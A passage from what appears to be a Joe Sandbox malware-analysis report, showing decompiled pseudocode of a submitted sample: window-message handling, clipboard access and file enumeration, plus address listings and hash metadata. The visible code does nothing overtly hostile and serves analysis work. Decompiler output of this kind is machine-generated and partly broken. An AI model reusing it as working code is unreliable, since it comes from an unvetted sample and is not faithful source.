    																			_v212 = 0;
    																		} else {
    																			_v212 = _v140;
    																		}
    																		_t1048 =  *((intOrPtr*)(_v24 + 8));
    																		__eflags = _v212 -  *((intOrPtr*)(_t1048 + 0xc)) - _v136;
    																		if(_v212 >=  *((intOrPtr*)(_t1048 + 0xc)) - _v136) {
    																			_t799 =  *((intOrPtr*)( *((intOrPtr*)(_v24 + 8)) + 0xc)) - _v136;
    																			__eflags = _t799;
    																			_v220 = _t799;
    																		} else {
    																			__eflags = _v140;
    																			if(_v140 <= 0) {
    																				_v216 = 0;
    																			} else {
    																				_v216 = _v140;
    																			}
    																			_v220 = _v216;
    																		}
    																		_v140 = _v220;
    																		_t1052 =  *((intOrPtr*)(_v24 + 8));
    																		__eflags = _v140 -  *((intOrPtr*)(_t1052 + 0x70));
    																		if(_v140 !=  *((intOrPtr*)(_t1052 + 0x70))) {
    																			 *( *((intOrPtr*)(_v24 + 8)) + 0x70) = _v140;
    																			_t1056 = _v140 + _v136 - 1;
    																			__eflags = _t1056;
    																			 *( *((intOrPtr*)(_v24 + 8)) + 0x78) = _t1056;
    																			_v292 = _v24;
    																			E001A8E70();
    																		}
    																	} else {
    																	}
    																	goto L193;
    																} else {
    																	if(_v160 == 0x115) {
    																		L153:
    																		_v148 =  *( *((intOrPtr*)(_v24 + 8)) + 0x7c) -  *( *((intOrPtr*)(_v24 + 8)) + 0x74) + 1;
    																		_v152 =  *( *((intOrPtr*)(_v24 + 8)) + 0x74);
    																		_t824 = _v24;
    																		__eflags =  *(_t824 + 0x84);
    																		if( *(_t824 + 0x84) != 0) {
    																			__eflags = _a8 - 0x20a;
    																			if(_a8 != 0x20a) {
    																				_t825 = _a12;
    																				_v228 = _t825 & 0x0000ffff;
    																				__eflags = _t825 - 5;
    																				if(_t825 - 5 <= 0) {
    																					goto __eax;
    																				}
    																			} else {
    																				_v156 = 3;
    																				SystemParametersInfoW(0x68, 0,  &_v156, 0);
    																				_t1196 = _t1196 - 0x10;
    																				asm("cdq");
    																				_v156 = (0 - (_a12 >> 0x00000010 & 0x0000ffff)) / 0x78 * _v156;
    																				_v152 = _v156 + _v152;
    																			}
    																			__eflags = _v152;
    																			if(_v152 <= 0) {
    																				_v232 = 0;
    																			} else {
    																				_v232 = _v152;
    																			}
    																			_t1061 =  *((intOrPtr*)(_v24 + 8));
    																			__eflags = _v232 -  *((intOrPtr*)(_t1061 + 0x10)) - _v148;
    																			if(_v232 >=  *((intOrPtr*)(_t1061 + 0x10)) - _v148) {
    																				_t832 =  *((intOrPtr*)( *((intOrPtr*)(_v24 + 8)) + 0x10)) - _v148;
    																				__eflags = _t832;
    																				_v240 = _t832;
    																			} else {
    																				__eflags = _v152;
    																				if(_v152 <= 0) {
    																					_v236 = 0;
    																				} else {
    																					_v236 = _v152;
    																				}
    																				_v240 = _v236;
    																			}
    																			_v152 = _v240;
    																			_t1065 =  *((intOrPtr*)(_v24 + 8));
    																			__eflags = _v152 -  *((intOrPtr*)(_t1065 + 0x74));
    																			if(_v152 !=  *((intOrPtr*)(_t1065 + 0x74))) {
    																				 *( *((intOrPtr*)(_v24 + 8)) + 0x74) = _v152;
    																				_t1069 = _v152 + _v148 - 1;
    																				__eflags = _t1069;
    																				 *( *((intOrPtr*)(_v24 + 8)) + 0x7c) = _t1069;
    																				_v292 = _v24;
    																				E001A8E70();
    																			}
    																		} else {
    																		}
    																		goto L193;
    																	} else {
    																		if(_v160 == 0x117) {
    																			_t860 = _v24;
    																			__eflags =  *(_t860 + 0x84);
    																			if( *(_t860 + 0x84) == 0) {
    																				L190:
    																				_v20 = DefWindowProcW(_a4, _a8, _a12, _a16);
    																			} else {
    																				__eflags = _a16 >> 0x00000010 & 0x0000ffff;
    																				if((_a16 >> 0x00000010 & 0x0000ffff) != 0) {
    																					_t868 = GetSystemMenu( *(_v24 + 0xa8), 0);
    																					_v292 = _v24;
    																					_v288 = _t868;
    																					E001AA450();
    																					goto L193;
    																				} else {
    																					goto L190;
    																				}
    																			}
    																		} else {
    																			if(_v160 == 0x200) {
    																				_t872 = _v24;
    																				__eflags =  *(_t872 + 0x84);
    																				if( *(_t872 + 0x84) == 0) {
    																					L97:
    																					_v176 = _a12;
    																					_v292 = _v24;
    																					_v288 = _a16;
    																					_v104 = E001AA070();
    																					 *(_t1196 - 8) = _v24;
    																					_v296 = _v104;
    																					_v292 = _v176;
    																					_v288 = 1;
    																					E001AA0F0(_t1169);
    																				} else {
    																					_t879 =  *(_v24 + 0x84);
    																					__eflags = _t879[0xb];
    																					if(_t879[0xb] != 0) {
    																						L92:
    																						_t880 = GetCapture();
    																						_t1080 = _v24;
    																						__eflags = _t880 -  *((intOrPtr*)(_t1080 + 0xa8));
    																						if(_t880 ==  *((intOrPtr*)(_t1080 + 0xa8))) {
    																							_t882 =  *(_v24 + 0x84);
    																							__eflags = _t882[5];
    																							if(_t882[5] != 0) {
    																								__eflags = _a12 & 0x00000001;
    																								if((_a12 & 0x00000001) != 0) {
    																									_v292 = _v24;
    																									_v288 = _a16;
    																									_v100 = E001AA070();
    																									_t1083 =  &(( *(_v24 + 0x84))[6]);
    																									__eflags = _t1083;
    																									 *(_t1196 - 8) = _v24;
    																									_v296 =  *_t1083;
    																									_v292 = _v100;
    																									E001AA250();
    																								}
    																							}
    																						}
    																					} else {
    																						_t892 =  *(_v24 + 0x84);
    																						__eflags = _t892[5];
    																						if(_t892[5] == 0) {
    																							goto L97;
    																						} else {
    																							goto L92;
    																						}
    																					}
    																				}
    																				goto L193;
    																			} else {
    																				if(_v160 == 0x201) {
    																					_t895 = _v24;
    																					__eflags =  *(_t895 + 0x84);
    																					if( *(_t895 + 0x84) == 0) {
    																						L87:
    																						_v172 = _a12;
    																						_v292 = _v24;
    																						_v288 = _a16;
    																						_v96 = E001AA070();
    																						__eflags = 0;
    																						 *(_t1196 - 8) = _v24;
    																						_v296 = _v96;
    																						_v292 = _v172;
    																						_v288 = 0;
    																						E001AA0F0(_t1169);
    																					} else {
    																						_t902 =  *(_v24 + 0x84);
    																						__eflags = _t902[0xb];
    																						if(_t902[0xb] != 0) {
    																							L80:
    																							_t904 =  *(_v24 + 0x84);
    																							__eflags = _t904[5];
    																							if(_t904[5] != 0) {
    																								__eflags = 0;
    																								_v292 = _v24;
    																								_v288 = 0;
    																								E001A9950(0);
    																								_t1196 = _t1196 - 8;
    																							}
    																							_t906 =  *(_v24 + 0x84);
    																							__eflags = _t906[0xb];
    																							if(_t906[0xb] == 0) {
    																								L85:
    																								_v168 =  *(_v24 + 0x84);
    																								_v292 = _v24;
    																								_v288 = _a16;
    																								_t910 = E001AA070();
    																								_t1226 = _t1196 - 8;
    																								_v92 = _t910;
    																								_v168[7] = _v92;
    																								( *(_v24 + 0x84))[6] = ( *(_v24 + 0x84))[7];
    																								 *_t1226 =  *(_v24 + 0xa8);
    																								SetCapture(??);
    																								__eflags = 0;
    																								 *((intOrPtr*)(_t1226 - 4)) = _v24;
    																								_v296 = 0;
    																								E001A9950(0);
    																								( *(_v24 + 0x84))[5] = 1;
    																							} else {
    																								_t922 =  *(_v24 + 0x84);
    																								__eflags = _t922[5];
    																								if(_t922[5] == 0) {
    																									goto L85;
    																								} else {
    																									( *(_v24 + 0x84))[5] = 0;
    																								}
    																							}
    																						} else {
    																							_t928 =  *(_v24 + 0x84);
    																							__eflags = _t928[5];
    																							if(_t928[5] == 0) {
    																								goto L87;
    																							} else {
    																								goto L80;
    																							}
    																						}
    																					}
    																					goto L193;
    																				} else {
    																					if(_v160 == 0x202) {
    																						_t931 = _v24;
    																						__eflags =  *(_t931 + 0x84);
    																						if( *(_t931 + 0x84) == 0) {
    																							L106:
    																							_v180 = _a12;
    																							_v292 = _v24;
    																							_v288 = _a16;
    																							_v112 = E001AA070();
    																							__eflags = 0;
    																							 *(_t1196 - 8) = _v24;
    																							_v296 = _v112;
    																							_v292 = _v180;
    																							_v288 = 0;
    																							E001AA0F0(_t1169);
    																						} else {
    																							_t938 =  *(_v24 + 0x84);
    																							__eflags = _t938[0xb];
    																							if(_t938[0xb] != 0) {
    																								L102:
    																								_t939 = GetCapture();
    																								_t1101 = _v24;
    																								__eflags = _t939 -  *((intOrPtr*)(_t1101 + 0xa8));
    																								if(_t939 ==  *((intOrPtr*)(_t1101 + 0xa8))) {
    																									_t941 =  *(_v24 + 0x84);
    																									__eflags = _t941[5];
    																									if(_t941[5] != 0) {
    																										_v292 = _v24;
    																										_v288 = _a16;
    																										_v108 = E001AA070();
    																										_t1104 =  &(( *(_v24 + 0x84))[6]);
    																										__eflags = _t1104;
    																										 *(_t1196 - 8) = _v24;
    																										_v296 =  *_t1104;
    																										_v292 = _v108;
    																										E001AA250();
    																										ReleaseCapture();
    																									}
    																								}
    																							} else {
    																								_t950 =  *(_v24 + 0x84);
    																								__eflags = _t950[5];
    																								if(_t950[5] == 0) {
    																									goto L106;
    																								} else {
    																									goto L102;
    																								}
    																							}
    																						}
    																						goto L193;
    																					} else {
    																						if(_v160 == 0x203) {
    																							L114:
    																							_v192 = _a12;
    																							_v292 = _v24;
    																							_v288 = _a16;
    																							_v132 = E001AA070();
    																							 *(_t1196 - 8) = _v24;
    																							_v296 = _v132;
    																							_v292 = _v192;
    																							_v288 = 2;
    																							E001AA0F0(_t1169);
    																							goto L193;
    																						} else {
    																							if(_v160 == 0x204) {
    																								_t960 = _v24;
    																								__eflags =  *(_t960 + 0x84);
    																								if( *(_t960 + 0x84) == 0) {
    																									L111:
    																									_v184 = _a12;
    																									_v292 = _v24;
    																									_v288 = _a16;
    																									_v124 = E001AA070();
    																									__eflags = 0;
    																									 *(_t1196 - 8) = _v24;
    																									_v296 = _v124;
    																									_v292 = _v184;
    																									_v288 = 0;
    																									E001AA0F0(_t1169);
    																								} else {
    																									_t1115 =  *(_v24 + 0x84);
    																									__eflags = (_a12 & 0x0000000c) - _t1115[0xc];
    																									if((_a12 & 0x0000000c) != _t1115[0xc]) {
    																										goto L111;
    																									} else {
    																										_v120.x = _a16 & 0x0000ffff;
    																										_v120.y = _a16 >> 0x00000010 & 0x0000ffff;
    																										ClientToScreen(_a4,  &_v120);
    																										_v292 = _v24;
    																										_v288 = ( *(_v24 + 0x84))[3];
    																										E001AA450();
    																										 *_t1196 = ( *(_v24 + 0x84))[3];
    																										_v296 = 2;
    																										_v292 = _v120.x;
    																										_v288 = _v120.y;
    																										_v284 = 0;
    																										_v280 = _a4;
    																										_v276 = 0;
    																										TrackPopupMenu(??, ??, ??, ??, ??, ??, ??);
    																									}
    																								}
    																								goto L193;
    																							} else {
    																								if(_v160 == 0x205) {
    																									L113:
    																									_v188 = _a12;
    																									_v292 = _v24;
    																									_v288 = _a16;
    																									_v128 = E001AA070();
    																									 *(_t1196 - 8) = _v24;
    																									_v296 = _v128;
    																									_v292 = _v188;
    																									_v288 = 0;
    																									E001AA0F0(_t1169);
    																									goto L193;
    																								} else {
    																									if(_v160 == 0x206) {
    																										goto L114;
    																									} else {
    																										if(_v160 + 0xfffffdf9 - 2 < 0) {
    																											goto L113;
    																										} else {
    																											if(_v160 == 0x209) {
    																												goto L114;
    																											} else {
    																												if(_v160 == 0x20a) {
    																													_t1000 =  *((intOrPtr*)(_v24 + 8));
    																													_t1124 =  *((intOrPtr*)(_v24 + 8));
    																													_t1166 =  *((intOrPtr*)(_v24 + 8));
    																													__eflags =  *((intOrPtr*)(_t1000 + 0x10)) -  *((intOrPtr*)(_t1124 + 0x7c)) -  *((intOrPtr*)(_t1166 + 0x74)) + 1;
    																													if( *((intOrPtr*)(_t1000 + 0x10)) >  *((intOrPtr*)(_t1124 + 0x7c)) -  *((intOrPtr*)(_t1166 + 0x74)) + 1) {
    																														goto L153;
    																													} else {
    																														_v224 = _a12;
    																														_v292 = _v24;
    																														_v288 = _a16;
    																														_v144 = E001AA070();
    																														 *(_t1196 - 8) = _v24;
    																														_v296 = _v144;
    																														_v292 = _v224;
    																														_v288 = 4;
    																														E001AA0F0(_t1169);
    																													}
    																													L193:
    																													_v20 = 0;
    																												} else {
    																													if(_v160 == 0x401) {
    																														goto L54;
    																													} else {
    																														_v20 = DefWindowProcW(_a4, _a8, _a12, _a16);
    																													}
    																												}
    																											}
    																										}
    																									}
    																								}
    																							}
    																						}
    																					}
    																				}
    																			}
    																		}
    																	}
    																}
    															}
    														}
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    				return _v20;
    			}































































































































    0x001a34fb
    0x001a34fd
    0x001a34ff
    0x001a350b
    0x001a350d
    0x001a3510
    0x001a3513
    0x001a3516
    0x001a351f
    0x001a3762
    0x001a3525
    0x001a3533
    0x001a376d
    0x001a3780
    0x00000000
    0x001a3539
    0x001a3547
    0x001a4020
    0x001a4023
    0x001a402a
    0x001a4033
    0x001a4039
    0x001a403d
    0x001a404e
    0x001a4057
    0x001a405e
    0x001a4061
    0x001a4064
    0x001a4098
    0x001a406a
    0x001a4085
    0x001a4088
    0x001a4088
    0x001a40a9
    0x001a40c7
    0x001a40ca
    0x001a40cd
    0x001a40fe
    0x001a40d3
    0x001a40eb
    0x001a40ee
    0x001a40ee
    0x001a4118
    0x001a411b
    0x001a411f
    0x001a4123
    0x001a4128
    0x001a403d
    0x00000000
    0x001a354d
    0x001a355b
    0x001a3f7b
    0x001a3f7e
    0x001a3f85
    0x001a3f8e
    0x001a3f91
    0x001a3f95
    0x001a3fd9
    0x001a3fe5
    0x001a3fe8
    0x001a3fed
    0x001a3f95
    0x00000000
    0x001a3561
    0x001a356f
    0x001a3ff5
    0x001a3ff8
    0x001a3fff
    0x001a4008
    0x001a400b
    0x001a400f
    0x001a4015
    0x001a4015
    0x001a400f
    0x00000000
    0x001a3575
    0x001a3583
    0x001a37c4
    0x001a37c7
    0x001a37ce
    0x001a37ec
    0x001a380e
    0x001a38bc
    0x001a38c2
    0x001a38ce
    0x001a38d2
    0x001a38de
    0x001a38e1
    0x001a38e5
    0x001a38ea
    0x001a38ea
    0x001a38f9
    0x001a38fc
    0x001a3900
    0x00000000
    0x001a37d4
    0x00000000
    0x001a3589
    0x001a3597
    0x001a390e
    0x001a3911
    0x001a3918
    0x001a3923
    0x001a3927
    0x001a3943
    0x001a3949
    0x001a394d
    0x001a3962
    0x001a3968
    0x001a3974
    0x001a392d
    0x001a3930
    0x001a3933
    0x001a3938
    0x00000000
    0x001a391e
    0x00000000
    0x001a359d
    0x001a35b0
    0x001a3980
    0x001a3983
    0x001a398a
    0x001a39d8
    0x001a39de
    0x001a39e8
    0x001a39e8
    0x001a39f1
    0x001a39f4
    0x001a39f8
    0x001a39fc
    0x001a3a00
    0x001a3990
    0x001a3993
    0x001a3999
    0x001a399d
    0x00000000
    0x001a39a3
    0x001a39a9
    0x001a39bc
    0x001a39bf
    0x001a39c3
    0x001a39c7
    0x001a39cb
    0x001a39d0
    0x001a399d
    0x00000000
    0x001a35b6
    0x001a35c9
    0x001a3a13
    0x001a3a26
    0x001a3a29
    0x001a3a2d
    0x001a3a31
    0x001a3a35
    0x00000000
    0x001a35cf
    0x001a35df
    0x001a4671
    0x001a4674
    0x001a467b
    0x001a4689
    0x001a468e
    0x001a4694
    0x001a4697
    0x001a46aa
    0x001a46aa
    0x001a485a
    0x001a4681
    0x00000000
    0x001a4681
    0x001a35e5
    0x001a35f5
    0x001a45c4
    0x001a45c7
    0x001a45ce
    0x001a45d9
    0x001a45dc
    0x001a45e2
    0x001a45e7
    0x001a460d
    0x001a4610
    0x001a4618
    0x00000000
    0x001a45ed
    0x001a45f8
    0x001a45fd
    0x001a4628
    0x001a462b
    0x001a4633
    0x001a466c
    0x00000000
    0x001a4603
    0x001a4664
    0x001a4664
    0x001a45fd
    0x001a45d4
    0x00000000
    0x001a45d4
    0x001a35fb
    0x001a360b
    0x001a378e
    0x001a378e
    0x001a3791
    0x001a3798
    0x001a37a1
    0x001a37a7
    0x001a37ab
    0x001a37b4
    0x001a37b7
    0x001a37bc
    0x001a37ab
    0x00000000
    0x001a3611
    0x001a3621
    0x001a4145
    0x001a4154
    0x001a415a
    0x001a415d
    0x001a4164
    0x001a416f
    0x001a4175
    0x001a417b
    0x001a417f
    0x001a4192
    0x001a4192
    0x001a4202
    0x001a4209
    0x001a4222
    0x001a420f
    0x001a4215
    0x001a4215
    0x001a4236
    0x001a4242
    0x001a4244
    0x001a428f
    0x001a428f
    0x001a4295
    0x001a424a
    0x001a424a
    0x001a4251
    0x001a426a
    0x001a4257
    0x001a425d
    0x001a425d
    0x001a427b
    0x001a427b
    0x001a42a1
    0x001a42b0
    0x001a42b3
    0x001a42b6
    0x001a42c8
    0x001a42d7
    0x001a42d7
    0x001a42e0
    0x001a42e6
    0x001a42e9
    0x001a42ee
    0x00000000
    0x001a416a
    0x00000000
    0x001a3627
    0x001a3637
    0x001a4378
    0x001a438d
    0x001a439c
    0x001a43a2
    0x001a43a5
    0x001a43ac
    0x001a43b7
    0x001a43be
    0x001a4438
    0x001a443e
    0x001a4444
    0x001a4448
    0x001a445b
    0x001a445b
    0x001a43c4
    0x001a43c4
    0x001a43f1
    0x001a43f7
    0x001a4411
    0x001a441b
    0x001a442d
    0x001a442d
    0x001a44d0
    0x001a44d7
    0x001a44f0
    0x001a44dd
    0x001a44e3
    0x001a44e3
    0x001a4504
    0x001a4510
    0x001a4512
    0x001a455d
    0x001a455d
    0x001a4563
    0x001a4518
    0x001a4518
    0x001a451f
    0x001a4538
    0x001a4525
    0x001a452b
    0x001a452b
    0x001a4549
    0x001a4549
    0x001a456f
    0x001a457e
    0x001a4581
    0x001a4584
    0x001a4596
    0x001a45a5
    0x001a45a5
    0x001a45ae
    0x001a45b4
    0x001a45b7
    0x001a45bc
    0x00000000
    0x001a43b2
    0x00000000
    0x001a363d
    0x001a364d
    0x001a4867
    0x001a486a
    0x001a4871
    0x001a488c
    0x001a48b0
    0x001a4877
    0x001a4882
    0x001a4886
    0x001a48ce
    0x001a48da
    0x001a48dd
    0x001a48e1
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001a4886
    0x001a3653
    0x001a3663
    0x001a3bc0
    0x001a3bc3
    0x001a3bca
    0x001a3c73
    0x001a3c76
    0x001a3c82
    0x001a3c85
    0x001a3c99
    0x001a3ca2
    0x001a3ca7
    0x001a3cab
    0x001a3caf
    0x001a3cb7
    0x001a3bd0
    0x001a3bd3
    0x001a3bd9
    0x001a3bdd
    0x001a3bf6
    0x001a3bf6
    0x001a3bfc
    0x001a3bff
    0x001a3c05
    0x001a3c0e
    0x001a3c14
    0x001a3c18
    0x001a3c24
    0x001a3c27
    0x001a3c33
    0x001a3c36
    0x001a3c42
    0x001a3c4e
    0x001a3c4e
    0x001a3c57
    0x001a3c5c
    0x001a3c62
    0x001a3c66
    0x001a3c6b
    0x001a3c27
    0x001a3c18
    0x001a3be3
    0x001a3be6
    0x001a3bec
    0x001a3bf0
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001a3bf0
    0x001a3bdd
    0x00000000
    0x001a3669
    0x001a3679
    0x001a3a42
    0x001a3a45
    0x001a3a4c
    0x001a3b6d
    0x001a3b70
    0x001a3b7c
    0x001a3b7f
    0x001a3b93
    0x001a3b9c
    0x001a3b9e
    0x001a3ba3
    0x001a3ba7
    0x001a3bab
    0x001a3bb3
    0x001a3a52
    0x001a3a55
    0x001a3a5b
    0x001a3a5f
    0x001a3a78
    0x001a3a7b
    0x001a3a81
    0x001a3a85
    0x001a3a8e
    0x001a3a90
    0x001a3a93
    0x001a3a9b
    0x001a3aa0
    0x001a3aa0
    0x001a3aa6
    0x001a3aac
    0x001a3ab0
    0x001a3ade
    0x001a3ae7
    0x001a3af3
    0x001a3af6
    0x001a3afa
    0x001a3aff
    0x001a3b0a
    0x001a3b10
    0x001a3b28
    0x001a3b34
    0x001a3b37
    0x001a3b43
    0x001a3b45
    0x001a3b48
    0x001a3b50
    0x001a3b61
    0x001a3ab6
    0x001a3ab9
    0x001a3abf
    0x001a3ac3
    0x00000000
    0x001a3ac9
    0x001a3ad2
    0x001a3ad2
    0x001a3ac3
    0x001a3a65
    0x001a3a68
    0x001a3a6e
    0x001a3a72
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001a3a72
    0x001a3a5f
    0x00000000
    0x001a367f
    0x001a368f
    0x001a3cc4
    0x001a3cc7
    0x001a3cce
    0x001a3d6e
    0x001a3d71
    0x001a3d7d
    0x001a3d80
    0x001a3d94
    0x001a3d9d
    0x001a3d9f
    0x001a3da4
    0x001a3da8
    0x001a3dac
    0x001a3db4
    0x001a3cd4
    0x001a3cd7
    0x001a3cdd
    0x001a3ce1
    0x001a3cfa
    0x001a3cfa
    0x001a3d00
    0x001a3d03
    0x001a3d09
    0x001a3d12
    0x001a3d18
    0x001a3d1c
    0x001a3d28
    0x001a3d2b
    0x001a3d37
    0x001a3d43
    0x001a3d43
    0x001a3d4c
    0x001a3d51
    0x001a3d57
    0x001a3d5b
    0x001a3d63
    0x001a3d63
    0x001a3d1c
    0x001a3ce7
    0x001a3cea
    0x001a3cf0
    0x001a3cf4
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001a3cf4
    0x001a3ce1
    0x00000000
    0x001a3695
    0x001a36a5
    0x001a3f2a
    0x001a3f2d
    0x001a3f39
    0x001a3f3c
    0x001a3f50
    0x001a3f59
    0x001a3f5e
    0x001a3f62
    0x001a3f66
    0x001a3f6e
    0x00000000
    0x001a36ab
    0x001a36bb
    0x001a3dc1
    0x001a3dc4
    0x001a3dcb
    0x001a3e84
    0x001a3e87
    0x001a3e93
    0x001a3e96
    0x001a3eaa
    0x001a3eb3
    0x001a3eb5
    0x001a3eba
    0x001a3ebe
    0x001a3ec2
    0x001a3eca
    0x001a3dd1
    0x001a3dda
    0x001a3de0
    0x001a3de3
    0x00000000
    0x001a3de9
    0x001a3df2
    0x001a3e01
    0x001a3e11
    0x001a3e29
    0x001a3e2c
    0x001a3e30
    0x001a3e4f
    0x001a3e52
    0x001a3e5a
    0x001a3e5e
    0x001a3e62
    0x001a3e6a
    0x001a3e6e
    0x001a3e76
    0x001a3e7c
    0x001a3de3
    0x00000000
    0x001a36c1
    0x001a36d1
    0x001a3ed7
    0x001a3eda
    0x001a3ee6
    0x001a3ee9
    0x001a3efd
    0x001a3f08
    0x001a3f0d
    0x001a3f11
    0x001a3f15
    0x001a3f1d
    0x00000000
    0x001a36d7
    0x001a36e7
    0x00000000
    0x001a36ed
    0x001a3700
    0x00000000
    0x001a3706
    0x001a3716
    0x00000000
    0x001a371c
    0x001a372c
    0x001a42f9
    0x001a4302
    0x001a430b
    0x001a4314
    0x001a4316
    0x00000000
    0x001a431c
    0x001a431f
    0x001a432b
    0x001a432e
    0x001a4342
    0x001a4351
    0x001a4356
    0x001a435a
    0x001a435e
    0x001a4366
    0x001a436b
    0x001a491a
    0x001a491a
    0x001a3732
    0x001a3742
    0x00000000
    0x001a3748
    0x001a4912
    0x001a4912
    0x001a3742
    0x001a372c
    0x001a3716
    0x001a3700
    0x001a36e7
    0x001a36d1
    0x001a36bb
    0x001a36a5
    0x001a368f
    0x001a3679
    0x001a3663
    0x001a364d
    0x001a3637
    0x001a3621
    0x001a360b
    0x001a35f5
    0x001a35df
    0x001a35c9
    0x001a35b0
    0x001a3597
    0x001a3583
    0x001a356f
    0x001a355b
    0x001a3547
    0x001a3533
    0x001a492e

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: Capture$CaretPaintProcWindow$BeginClientCreateDestroyMenuMessagePopupPostQuitReleaseScreenTrack
    • String ID:
    • API String ID: 3375179393-3916222277
    • Opcode ID: de41b19ba59b5f53168082908af9f4fb19e089043c9b63b3018ee71ee6039c23
    • Instruction ID: 5afa20859c6718332196d09b080423eea49ef5ea31548928db64d267087bdf25
    • Opcode Fuzzy Hash: de41b19ba59b5f53168082908af9f4fb19e089043c9b63b3018ee71ee6039c23
    • Instruction Fuzzy Hash: 06B2C7B8A04205CFDB14DF68C684BAEBBF1BF49304F1185A9E859A7351D7709E84CF62
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: ClipboardGlobal$AllocEmptyLockOpen
    • String ID:
    • API String ID: 3590494090-0
    • Opcode ID: 7ea8488cf8b326610b24b2a1f2ae528f894ba9123faa917ad4be0954af20c9ac
    • Instruction ID: f05416c245169e088ee523af27657900ec3d25a4a0990ddf7dc54e43551789e2
    • Opcode Fuzzy Hash: 7ea8488cf8b326610b24b2a1f2ae528f894ba9123faa917ad4be0954af20c9ac
    • Instruction Fuzzy Hash: 3D81E574A002199FCB08DFA8C588ABDBBF0FF09315F154469E845EB351E734E981CB55
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: ClipboardGlobal$CloseDataLockOpenScanSizeUnlockVirtual
    • String ID:
    • API String ID: 1615112705-0
    • Opcode ID: f7ad40149b0515b5a0089de057277dd954aea54071a9d24c83f5c9447bb85fea
    • Instruction ID: 3f51e8f12c20af99c99a56c01d0a750b21e28a8f76967d30c0c7c26d21164bfb
    • Opcode Fuzzy Hash: f7ad40149b0515b5a0089de057277dd954aea54071a9d24c83f5c9447bb85fea
    • Instruction Fuzzy Hash: 3C41D7B5904208EFDB00EFA8D5896ADBBF0FF05304F00846DE886E7351E7759994CB56
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 80%
    			E001B5347(WCHAR* _a4, signed int _a8, char* _a12) {
    				signed int _v8;
    				short _v552;
    				short _v554;
    				struct _WIN32_FIND_DATAW _v600;
    				char _v601;
    				signed int _v608;
    				signed int _v612;
    				intOrPtr _v616;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t30;
    				signed char _t32;
    				void* _t41;
    				intOrPtr _t43;
    				intOrPtr _t45;
    				int _t48;
    				signed int* _t59;
    				char* _t60;
    				WCHAR* _t68;
    				signed int _t70;
    				void* _t71;
    
    				_t30 =  *0x1c4050; // 0x33da424a
    				_v8 = _t30 ^ _t70;
    				_t65 = _a8;
    				_t60 = _a12;
    				_t68 = _a4;
    				_v608 = _t60;
    				if(_t65 != _t68) {
    					while(E001B54BD( *_t65 & 0x0000ffff) == 0) {
    						_t65 = _t65 - 2;
    						if(_t65 != _t68) {
    							continue;
    						}
    						break;
    					}
    					_t60 = _v608;
    				}
    				_t69 =  *_t65 & 0x0000ffff;
    				if(( *_t65 & 0x0000ffff) != 0x3a) {
    					L8:
    					_t60 =  &_v601;
    					_t32 = E001B54BD(_t69);
    					_t65 = (_t65 - _t68 >> 1) + 1;
    					asm("sbb eax, eax");
    					_t59 = 0;
    					_v612 =  ~(_t32 & 0x000000ff) & _t65;
    					_t69 = FindFirstFileExW(_t68, 0,  &_v600, 0, 0, 0);
    					if(_t69 != 0xffffffff) {
    						_t59 = _v608;
    						_v608 = _t59[1] -  *_t59 >> 2;
    						_t41 = 0x2e;
    						do {
    							if(_v600.cFileName != _t41 || _v554 != 0 && (_v554 != _t41 || _v552 != 0)) {
    								_push(_t59);
    								_t43 = E001B5293(_t60,  &(_v600.cFileName), _t68, _v612);
    								_t71 = _t71 + 0x10;
    								_v616 = _t43;
    								if(_t43 != 0) {
    									FindClose(_t69);
    									_t45 = _v616;
    								} else {
    									goto L16;
    								}
    							} else {
    								goto L16;
    							}
    							goto L21;
    							L16:
    							_t48 = FindNextFileW(_t69,  &_v600);
    							_t41 = 0x2e;
    						} while (_t48 != 0);
    						_t65 =  *_t59;
    						_t63 = _v608;
    						_t51 = _t59[1] -  *_t59 >> 2;
    						if(_v608 != _t59[1] -  *_t59 >> 2) {
    							E001B80B0(_t65, _t65 + _t63 * 4, _t51 - _t63, 4, E001B54E1);
    						}
    						FindClose(_t69);
    						_t45 = 0;
    					} else {
    						_push(_v608);
    						goto L7;
    					}
    				} else {
